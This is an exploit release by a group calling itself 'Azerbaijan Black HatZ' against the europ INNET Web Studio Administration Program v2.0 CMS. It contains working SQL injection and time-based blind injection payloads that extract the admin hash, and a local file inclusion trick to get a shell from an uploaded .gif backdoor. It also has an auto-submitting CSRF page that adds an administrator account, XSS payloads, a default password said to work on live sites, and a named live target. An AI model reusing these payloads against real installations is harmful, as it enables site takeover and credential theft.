europ INNET Web Studio Administration Program version 2.0 suffers from cross site request forgery, cross site scripting, local file inclusion, path disclosure, and remote SQL injection vulnerabilities.
8b945b66041046c68f9608814b1da5af72c0a32cca28ec9997b10974d6f42623
======================================================
Vulnerable software: Administration Programm v 2.0
Vendor: europ INNET Web Studio, www.europ-innet.com
======================================================
************************ Vulnerabilities: *************************************
//insert_guest_book.php
==============VULNERABLE CODE SECTION=================
<?
session_start();
ob_start();
if (!isset($_POST['guest_submit']))
exit();
include('admin/connect.php');
include('admin/api.php');
$name = $_POST['g_name'];
$message = $_POST['g_message'];
if (trim($_POST['g_message']) == '')
{
header('location:view-page-33-gm-2.html');exit();
}
if ($_SESSION['image_random_value'] != md5($_POST['e_code']))
{
header('location:view-page-33-gm-3.html');exit();
}
$query = "INSERT INTO `guest_book` SET `name`='".$_POST['g_name']."', `Enable`='0', `message`='".$_POST['g_message']."';";
mysql_query($query,$conn);
header('location:view-page-33-gm-1.html');
?>
============== END OF VULNERABLE CODE SECTION =======================
Exploitation:
Payload: ' or message=(select concat(login,0x7c,password) from us_config limit 1),message=(select concat(login,0x7c,password) from us_config limit 1),enable=1-- AND 0='0
URL: http://192.168.0.15/learn/7878/view-page-33-gm-1.html
REQUEST METHOD: POST
HTTP HEADERS:
Host: 192.168.0.15
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: ASPX=urjgh0qn8jldqigu6hrsqhc5cr4lf80f
Content-Type: application/x-www-form-urlencoded
Content-Length: 449
POST BODY:
g_name=%27+or+message%3D%28select+concat%28login%2C0x7c%2Cpassword%29+from+us_config+limit+1%29%2Cmessage%3D%28select+concat%28login%2C0x7c%2Cpassword%29+from+us_config+limit+1%29%2Cenable%3D1--+AND+0%3D%270&g_message=%27+or+message%3D%28select+concat%28login%2C0x7c%2Cpassword%29+from+us_config+limit+1%29%2Cmessage%3D%28select+concat%28login%2C0x7c%2Cpassword%29+from+us_config+limit+1%29%2Cenable%3D1--+AND+0%3D%270&e_code=15984&guest_submit=Send
RESULT: You will see credentials like: developer|0cc175b9c0f1b6a831c399e269772661
Theris also possible to create XSS through SQLi
Payload:
' or message=(select 0x3C7363726970743E616C6572742827596F752068617665204265656E2050774E654420427920417A65726261696A616E20426C61636B204861745A27293B3C2F7363726970743E),message=(select 0x3C7363726970743E616C6572742827596F752068617665204265656E2050774E654420427920417A65726261696A616E20426C61636B204861745A27293B3C2F7363726970743E),enable=1-- AND 0='0
Print Screen: http://s59.radikal.ru/i165/1207/a7/2bd24a646ee3.png
========================================================================
Second: Blind SQL Injection
We used time based way to obtain credentials (I spent 6 hours of my life to extract completely tables+columns+credentials for password: a)
=========================================================================
//includes/news_subscription.php
<?
session_start();
ob_start();
if (!isset($_POST['email_submit']))
exit();
$p_email_2 = $_POST['p_email_2'];
$query = "INSERT INTO `users_email_list` SET `users_email`='".$_POST['p_email_2']."';";
mysql_query($query,$conn);
?>
======================END OF VULNERABLE CODE SECTION==================================
Here is that *final* stage of obtaining admin credentials:
developer adli soska xacikin parolunun 1 ci simvolu:
=================================================================
1-ci simvol: 0
//TRUE
email_submit=&p_email_2=' or (select if(substr(`password`,1,1)='0',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
2-ci simvol: c
email_submit=&p_email_2=' or (select if(substr(`password`,2,1)='c',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
3-cu simvol: c (yoxla sonra)
email_submit=&p_email_2=' or (select if(substr(`password`,3,1)='c',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
4-cu simvol: 1
email_submit=&p_email_2=' or (select if(substr(`password`,4,1)='1',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
5-ci simvol: 7
email_submit=&p_email_2=' or (select if(substr(`password`,5,1)='7',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
6-ci simvol: 5
email_submit=&p_email_2=' or (select if(substr(`password`,6,1)='5',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
7-ci simvol: b (yoxla sonra)
email_submit=&p_email_2=' or (select if(substr(`password`,7,1)='b',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
8-ci simvol: 9 (yoxla sonra)
email_submit=&p_email_2=' or (select if(substr(`password`,8,1)='9',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
9-cu simvol: c
email_submit=&p_email_2=' or (select if(substr(`password`,9,1)='c',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
10-cu simvol: 0 (yoxla sonra)
email_submit=&p_email_2=' or (select if(substr(`password`,10,1)='0',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
11-ci simvol: f
email_submit=&p_email_2=' or (select if(substr(`password`,11,1)='f',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
12-ci simvol: 1 (yoxla sonra server gicliyir nese sehv ola biler netice)
email_submit=&p_email_2=' or (select if(substr(`password`,12,1)='1',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
13-cu simvol: b
email_submit=&p_email_2=' or (select if(substr(`password`,13,1)='b',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
14-cu simvol: 6
email_submit=&p_email_2=' or (select if(substr(`password`,14,1)='6',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
15-ci simvol: a
email_submit=&p_email_2=' or (select if(substr(`password`,15,1)='a',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
16-ci simvol: 8
email_submit=&p_email_2=' or (select if(substr(`password`,16,1)='8',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
17-ci simvol: 3
email_submit=&p_email_2=' or (select if(substr(`password`,17,1)='3',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
18-ci simvol: 1
email_submit=&p_email_2=' or (select if(substr(`password`,18,1)='1',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
19-cu simvol: c
email_submit=&p_email_2=' or (select if(substr(`password`,19,1)='c',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
20-ci simvol: 3
email_submit=&p_email_2=' or (select if(substr(`password`,20,1)='3',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
21-ci simvol: 9
email_submit=&p_email_2=' or (select if(substr(`password`,21,1)='9',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
22-ci simvol: 9
email_submit=&p_email_2=' or (select if(substr(`password`,22,1)='9',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
23-cu simvol: e
email_submit=&p_email_2=' or (select if(substr(`password`,23,1)='e',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
24-cu simvol: 2
email_submit=&p_email_2=' or (select if(substr(`password`,24,1)='2',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
25-ci simvol: 6
email_submit=&p_email_2=' or (select if(substr(`password`,25,1)='6',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
26-ci simvol: 9
email_submit=&p_email_2=' or (select if(substr(`password`,26,1)='9',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
27-ci simvol: 7
email_submit=&p_email_2=' or (select if(substr(`password`,27,1)='7',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
28-ci simvol: 7
email_submit=&p_email_2=' or (select if(substr(`password`,28,1)='7',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
29-cu simvol: 2
email_submit=&p_email_2=' or (select if(substr(`password`,29,1)='2',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
30-cu simvol: 6
email_submit=&p_email_2=' or (select if(substr(`password`,30,1)='6',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
31-ci simvol: 6
email_submit=&p_email_2=' or (select if(substr(`password`,31,1)='6',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
32-ci simvol: 1
email_submit=&p_email_2=' or (select if(substr(`password`,32,1)='1',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
Login: developer
MD5 HASH: 0cc175b9c0f1b6a831c399e269772661
Pass: a
==================================================================
Local File Inclusion+Exploitation:
//admin/editor.php
===================== BEGIN VULNERABLE CODE SECTION======================
$page=$_GET["page"];
// CALCULATE ACCESS LEVEL
$res=mysql_query("SELECT * FROM `navigation_menu` where Section='".$section."' and Page='".$page."'",$conn);
$arr2=mysql_fetch_array($res);
if($arr2['access_level__Name__Access_Level']!=''){
$_SESSION['s_admin_access_level']=$arr2['access_level__Name__Access_Level'];
}
/////////////////////////// FIX PAGE
if($page==""){$page="main";}
if(is_file("includes/".$page.".php")==false){$page="main";}
BTW,same code snippet also is vulnerable to SQL injection but it is a bit hard to exploit it because you will get permission error.
You can use this way to obtain others passwords:
http://192.168.0.15/learn/7878/admin/editor.php?page=help%27%20or%20%28select%20if%28substr%28login,1,1%29=%27d%27,sleep%2830%29,0%29%20from%20us_config%20limit%201%29--%20ANd%20999=%27999
====================END OF VULNERABLE CODE SECTION ======================
Goto:
http://site.tld/admin/editor.php?page=images/images
First Upload your backdoor as *.gif file:
Then try to include it like this:
http://site.tld/admin/editor.php?page=../..///db/mea.gif%00
You will get shell there ;)
==========================================================================
CSRF add admin:
Login: akastep
Password: akastep
=================BEGIN EXPLOIT============================================
<!DOCTYPE HTML>
<head>
<title>0day For you.</title>
</head>
<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://===>CHANGE_TO_TARGET<===/admin/editor.php?page=submit§ion=us_config">
<input type="text" name="Full_Name" value="akastep" />
<select name="access_level__Name__Access_Level">
<option value="">None</option>
<option value="1">Content Manager</option>
<option value="2">Advanced Manager</option>
<option value="3">Administrator</option>
<option value="4">System Administrator</option>
<option value="5" selected>Developer</option>
</select>
<!-- Developer = High Privilegie -->
<input type="text" name="combobox_access_level__Name__Access_Level" value="1" />
<input type="text" name="Email" value="pipi@pipi.tld" />
<input type="text" name="Login" value="akastep">
<input type="text" name="Password_password_cache" value="akastep">
<input type="text" name="Password" value="akastep" />
<input type="checkbox" name="Javascript_Navigation" value="1">
<input type="text" name="id" value="new" />
</form>
</body>
</html>
=================END OF CSRF EXPLOIT===================================
XSS:
http://192.168.0.15/learn/7878/admin/editor.php?section=users_email_list&show_page=18%3Cscript%3Ealert%28%22Enjoy%20With%200day%20xD%22%29;%3C/script%3E
========================================================================
Deafult Password:
We found few .am sites which uses this cms with following credentials:
Login: developer
Password: a
========================================================================
Path Disclosure:
http://192.168.0.15/learn/7878/admin/includes/auth.php
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\7878\admin\includes\auth.php on line 14
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\7878\admin\includes\auth.php on line 15 Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\7878\admin\includes\auth.php on line 39
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\7878\admin\includes\auth.php on line 46
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\7878\admin\includes\auth.php on line 49
http://www.europ-innet.com/menu.php
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in /home/content/e/u/r/europinnet1112/html/menu.php on line 6
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/content/e/u/r/europinnet1112/html/menu.php on line 8
=========================================================================
==========================================================================
Demo: dsif-am.org
Want more demos?
http://www.europ-innet.com/view-page-8.html
Enjoy)
********************* AZERBAIJAN BLACK HATZ***********************************
Of course we never forget our friends so, A BIG RESPECTS+THANKS TO ALL:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
===========================================================
Thanks + Respect to all friends!
/AkaStep & BOT_25